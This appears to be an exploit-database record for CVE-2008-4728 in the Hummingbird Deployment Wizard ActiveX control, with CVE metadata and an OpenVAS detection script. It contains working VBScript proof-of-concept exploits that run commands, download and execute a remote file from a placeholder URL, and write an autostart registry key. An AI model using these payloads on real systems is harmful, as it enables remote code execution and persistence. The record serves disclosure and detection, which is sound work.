ID EDB-ID:6773 Type exploitdb Reporter shinnai Modified 2008-10-17T00:00:00
Description
Hummingbird Deployment Wizard 2008 ActiveX Command Execution. CVE-2008-4728. Remote exploit for windows platform
------------------------------------------------------------------------------
Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution
url: http://www.hummingbird.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Info:
DeployRun.dll <= 10.0.0.44
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
Vulnerable method:
Sub Run (ByVal Path As String , ByVal CommandLine As String)
Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7
There are a lot of dangerous methods, just take a look and... good searching
------------------------------------------------------------------------------
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.Run "cmd.exe", "/C calc.exe"
End Sub
</script>
# milw0rm.com [2008-10-17]
{"hash": "d3ef3369328b972769d5efad7c60ac888f342b046d6da33d29427b93dfec98dc", "id": "EDB-ID:6773", "lastseen": "2016-02-01T01:37:18", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/6773/", "description": "Hummingbird Deployment Wizard 2008 ActiveX Command Execution. CVE-2008-4728. Remote exploit for windows platform", "title": "Hummingbird Deployment Wizard 2008 - ActiveX Command Execution", "sourceData": "------------------------------------------------------------------------------\n Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution\n url: http://www.hummingbird.com\n\n Author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://www.shinnai.net\n\n This was written for educational purpose. Use it at your own risk.\n Author will be not responsible for any damage.\n \n Info:\n DeployRun.dll <= 10.0.0.44\n \n Marked as:\n RegKey Safe for Script: False\n RegKey Safe for Init: False\n Implements IObjectSafety: True\n IDisp Safe: Safe for untrusted: caller,data \n IPersist Safe: Safe for untrusted: caller,data\n\n Vulnerable method:\n Sub Run (ByVal Path As String , ByVal CommandLine As String)\n\n Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7\n\n There are a lot of dangerous methods, just take a look and... good searching\n------------------------------------------------------------------------------\n<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>\n\n<script language='vbscript'>\n Sub tryMe\n test.Run \"cmd.exe\", \"/C calc.exe\"\n End Sub\n</script>\n\n# milw0rm.com [2008-10-17]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-4728"], "published": "2008-10-17T00:00:00", "osvdbidlist": ["49178"], "references": [], "reporter": "shinnai", "modified": "2008-10-17T00:00:00", "href": "https://www.exploit-db.com/exploits/6773/"}
{"cve": [{"lastseen": "2017-09-29T14:26:10", "references": ["https://www.exploit-db.com/exploits/6774", "http://www.vupen.com/english/advisories/2008/2857", "http://www.shinnai.net/xplits/TXT_L0z0Mimixdsko8kI6VFW.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45961", "http://www.securityfocus.com/bid/31799", "http://www.shinnai.net/xplits/TXT_2XfQ1sHruhjaoePszNTG.html", "https://www.exploit-db.com/exploits/6773", "http://www.shinnai.net/xplits/TXT_JqLchaIAfq4kSH0NsvJO.html", "https://www.exploit-db.com/exploits/6776"], "description": "Multiple insecure method vulnerabilities in the DeployRun.DeploymentSetup.1 (DeployRun.dll) ActiveX control 10.0.0.44 in Hummingbird Deployment Wizard 2008 allow remote attackers to execute arbitrary programs via the (1) Run and (2) PerformUpdateAsync methods, and (3) modify arbitrary registry values via the SetRegistryValueAsString method. NOTE: the SetRegistryValueAsString method could be leveraged for code execution by specifying executable file values to Startup folders.", "edition": 3, "reporter": "NVD", "published": "2008-10-23T20:00:00", "title": "CVE-2008-4728", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:10", "vector": "NONE", "value": 9.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4728"], "scanner": [], "modified": "2017-09-28T21:32:19", "cpe": ["cpe:/a:hummingbird:deployment_wizard:2008"], "id": "CVE-2008-4728", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4728", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T01:37:44", "osvdbidlist": ["49178"], "references": [], "edition": 1, "description": "Hummingbird Deployment Wizard 2008 ActiveX File Execution(2). CVE-2008-4728. Remote exploit for windows platform", "reporter": "shinnai", "published": "2008-10-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Hummingbird Deployment Wizard 2008 - ActiveX File Execution2", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4728"], "modified": "2008-10-17T00:00:00", "id": "EDB-ID:6776", "href": "https://www.exploit-db.com/exploits/6776/", "sourceData": "--------------------------------------------------------------------------------\n Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution(2)\n url: http://www.hummingbird.com\n\n Author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://www.shinnai.net\n\n This was written for educational purpose. Use it at your own risk.\n Author will be not responsible for any damage.\n \n Info:\n DeployRun.dll <= 10.0.0.44\n \n Marked as:\n RegKey Safe for Script: False\n RegKey Safe for Init: False\n Implements IObjectSafety: True\n IDisp Safe: Safe for untrusted: caller,data \n IPersist Safe: Safe for untrusted: caller,data\n\n Vulnerable method:\n Sub PerformUpdateAsync (ByVal ExecAfterComplete As String)\n\n Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7\n\n There are a lot of dangerous methods, just take a look and... good searching\n--------------------------------------------------------------------------------\n<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test' height='20' width='20'></object>\n\n<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>\n\n<script language='vbscript'>\n Sub tryMe\n test.PerformUpdateAsync \"calc.exe\"\n 'test.PerformUpdateAsync \"http://www.SomeSite.com/SomeFile.exe\"\n End Sub\n</script>\n\n# milw0rm.com [2008-10-17]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6776/"}, {"lastseen": "2016-02-01T01:37:27", "osvdbidlist": ["49178"], "references": [], "edition": 1, "description": "Hummingbird Deployment Wizard 2008 Registry Values Creation/Change. CVE-2008-4728. Remote exploit for windows platform", "reporter": "shinnai", "published": "2008-10-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Hummingbird Deployment Wizard 2008 Registry Values Creation/Change", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4728"], "modified": "2008-10-17T00:00:00", "id": "EDB-ID:6774", "href": "https://www.exploit-db.com/exploits/6774/", "sourceData": "------------------------------------------------------------------------------------\n Hummingbird Deployment Wizard 2008 (DeployRun.dll) Registry Values Creation/Change\n url: http://www.hummingbird.com\n\n Author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://www.shinnai.net\n\n This was written for educational purpose. Use it at your own risk.\n Author will be not responsible for any damage.\n \n Info:\n DeployRun.dll <= 10.0.0.44\n \n Marked as:\n RegKey Safe for Script: False\n RegKey Safe for Init: False\n Implements IObjectSafety: True\n IDisp Safe: Safe for untrusted: caller,data \n IPersist Safe: Safe for untrusted: caller,data\n\n Vulnerable method:\n Sub SetRegistryValueAsString (ByVal Path As String, ByVal v As String)\n\n Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7\n\n There are a lot of dangerous methods, just take a look and... good searching\n------------------------------------------------------------------------------------\n<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object>\n\n<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>\n\n<script language='vbscript'>\n Sub tryMe\n 'test.SetRegistryValueAsString \"Existing Registry Path + Existing Registry Key\", \"Value to change\"\n test.SetRegistryValueAsString \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\YourFavouriteKey\", \"Hello World!\"\n End Sub\n</script>\n\n# milw0rm.com [2008-10-17]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6774/"}], "d2": [{"lastseen": "2016-09-25T14:11:15", "references": [], "description": "**Name**| d2sec_hbdw \n---|--- \n**CVE**| CVE-2008-4728 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Hummingbird Deployment Wizard ActiveX Arbitrary Code Execution Vulnerability \n**Notes**| \n", "edition": 1, "reporter": "DSquare", "published": "2008-10-23T20:00:00", "title": "DSquare Exploit Pack: D2SEC_HBDW", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "d2", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4728"], "modified": "2008-10-23T20:00:00", "id": "D2SEC_HBDW", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hbdw", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-09-02T00:06:23", "references": ["http://secunia.com/advisories/32337", "http://www.frsirt.com/english/advisories/2008/2857"], "pluginID": "1361412562310900161", "description": "This host is installed with Deployment Wizard ActiveX Control and\n is prone to multiple security vulnerabilities. \n\n The multiple flaws are due to error in 'SetRegistryValueAsString()',\n 'Run()' and 'PerformUpdateAsync()' methods in DeployRun.DeploymentSetup.1\n (DeployRun.dll) ActiveX control.", "edition": 3, "reporter": "Copyright (C) 2008 SecPod", "published": "2008-10-23T00:00:00", "title": "Hummingbird Deployment Wizard ActiveX Control Multiple Security Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4728"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310900161", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900161", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hummingbird_deployment_activex_cntl_mul_vuln_900161.nasl 9349 2018-04-06 07:02:25Z cfischer $\n# Description: Hummingbird Deployment Wizard ActiveX Control Multiple Security Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\ntag_impact = \"Successful exploitation allows execution of arbitrary code.\n Impact Level : Application\";\n\ntag_solution = \"Set the kill-bit for the affected ActiveX control.\n No patch is available as on 21th October, 2008.\";\n\n\ntag_summary = \"This host is installed with Deployment Wizard ActiveX Control and\n is prone to multiple security vulnerabilities. \n\n The multiple flaws are due to error in 'SetRegistryValueAsString()',\n 'Run()' and 'PerformUpdateAsync()' methods in DeployRun.DeploymentSetup.1\n (DeployRun.dll) ActiveX control.\";\n\ntag_affected = \"Hummingbird Deployment Wizard version 10.0.0.44 and prior on Windows (all)\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900161\");\n script_version(\"$Revision: 9349 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:02:25 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2008-10-23 14:16:10 +0200 (Thu, 23 Oct 2008)\");\n script_cve_id(\"CVE-2008-4728\");\n script_bugtraq_id(31799);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_family(\"Denial of Service\");\n script_name(\"Hummingbird Deployment Wizard ActiveX Control Multiple Security Vulnerabilities\");\n\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"impact\" , value : tag_impact);\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/32337\");\n script_xref(name : \"URL\" , value : \"http://www.frsirt.com/english/advisories/2008/2857\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nwizPath = registry_get_sz(key:\"SOFTWARE\\Hummingbird\\Deployment Wizard\",\n item:\"HomeDir\");\nif(!wizPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\",string:wizPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\",string:wizPath + \n \"DeployPkgShell.exe\");\n\nname = kb_smb_name();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nsoc = open_sock_tcp(port);\nif(!soc){\n exit(0);\n}\n\nr = smb_session_request(soc:soc, remote:name);\nif(!r){\n close(soc);\n exit(0);\n}\n\nprot = smb_neg_prot(soc:soc);\nif(!prot){\n close(soc);\n exit(0);\n}\n\nr = smb_session_setup(soc:soc, login:login, password:pass, domain:domain,\n prot:prot);\nif(!r){\n close(soc);\n exit(0);\n}\n\nuid = session_extract_uid(reply:r);\nif(!uid){\n close(soc);\n exit(0);\n}\n\nr = smb_tconx(soc:soc, name:name, uid:uid, share:share);\nif(!r){\n close(soc);\n exit(0);\n}\n\ntid = tconx_extract_tid(reply:r);\nif(!tid){\n close(soc);\n exit(0);\n}\n\nfid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file);\nif(!fid){\n close(soc);\n exit(0);\n}\n\nwizVer = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid, offset:1735500);\nclose(soc);\n\nif(wizVer)\n{\n # Grep for version < 10.0.0.44\n if(ereg(pattern:\"^[0-9](\\..*)|10(\\.0(\\.0(\\.[0-3]?[0-9]|\\.4[0-4])?)?)($|[^.0-9])\",\n string:wizVer)){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-09T11:58:45", "references": ["http://secunia.com/advisories/32337", "http://www.frsirt.com/english/advisories/2008/2857"], "pluginID": "900161", "description": "This host is installed with Deployment Wizard ActiveX Control and\n is prone to multiple security vulnerabilities. \n\n The multiple flaws are due to error in 'SetRegistryValueAsString()',\n 'Run()' and 'PerformUpdateAsync()' methods in DeployRun.DeploymentSetup.1\n (DeployRun.dll) ActiveX control.", "edition": 2, "reporter": "Copyright (C) 2008 SecPod", "published": "2008-10-23T00:00:00", "title": "Hummingbird Deployment Wizard ActiveX Control Multiple Security Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4728"], "modified": "2017-09-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900161", "id": "OPENVAS:900161", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hummingbird_deployment_activex_cntl_mul_vuln_900161.nasl 7332 2017-09-29 14:16:56Z cfischer $\n# Description: Hummingbird Deployment Wizard ActiveX Control Multiple Security Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\ntag_impact = \"Successful exploitation allows execution of arbitrary code.\n Impact Level : Application\";\n\ntag_solution = \"Set the kill-bit for the affected ActiveX control.\n No patch is available as on 21th October, 2008.\";\n\n\ntag_summary = \"This host is installed with Deployment Wizard ActiveX Control and\n is prone to multiple security vulnerabilities. \n\n The multiple flaws are due to error in 'SetRegistryValueAsString()',\n 'Run()' and 'PerformUpdateAsync()' methods in DeployRun.DeploymentSetup.1\n (DeployRun.dll) ActiveX control.\";\n\ntag_affected = \"Hummingbird Deployment Wizard version 10.0.0.44 and prior on Windows (all)\";\n\nif(description)\n{\n script_id(900161);\n script_version(\"$Revision: 7332 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-29 16:16:56 +0200 (Fri, 29 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-10-23 14:16:10 +0200 (Thu, 23 Oct 2008)\");\n script_cve_id(\"CVE-2008-4728\");\n script_bugtraq_id(31799);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_family(\"Denial of Service\");\n script_name(\"Hummingbird Deployment Wizard ActiveX Control Multiple Security Vulnerabilities\");\n\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"impact\" , value : tag_impact);\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/32337\");\n script_xref(name : \"URL\" , value : \"http://www.frsirt.com/english/advisories/2008/2857\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nwizPath = registry_get_sz(key:\"SOFTWARE\\Hummingbird\\Deployment Wizard\",\n item:\"HomeDir\");\nif(!wizPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\",string:wizPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\",string:wizPath + \n \"DeployPkgShell.exe\");\n\nname = kb_smb_name();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nsoc = open_sock_tcp(port);\nif(!soc){\n exit(0);\n}\n\nr = smb_session_request(soc:soc, remote:name);\nif(!r){\n close(soc);\n exit(0);\n}\n\nprot = smb_neg_prot(soc:soc);\nif(!prot){\n close(soc);\n exit(0);\n}\n\nr = smb_session_setup(soc:soc, login:login, password:pass, domain:domain,\n prot:prot);\nif(!r){\n close(soc);\n exit(0);\n}\n\nuid = session_extract_uid(reply:r);\nif(!uid){\n close(soc);\n exit(0);\n}\n\nr = smb_tconx(soc:soc, name:name, uid:uid, share:share);\nif(!r){\n close(soc);\n exit(0);\n}\n\ntid = tconx_extract_tid(reply:r);\nif(!tid){\n close(soc);\n exit(0);\n}\n\nfid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file);\nif(!fid){\n close(soc);\n exit(0);\n}\n\nwizVer = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid, offset:1735500);\nclose(soc);\n\nif(wizVer)\n{\n # Grep for version < 10.0.0.44\n if(ereg(pattern:\"^[0-9](\\..*)|10(\\.0(\\.0(\\.[0-3]?[0-9]|\\.4[0-4])?)?)($|[^.0-9])\",\n string:wizVer)){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
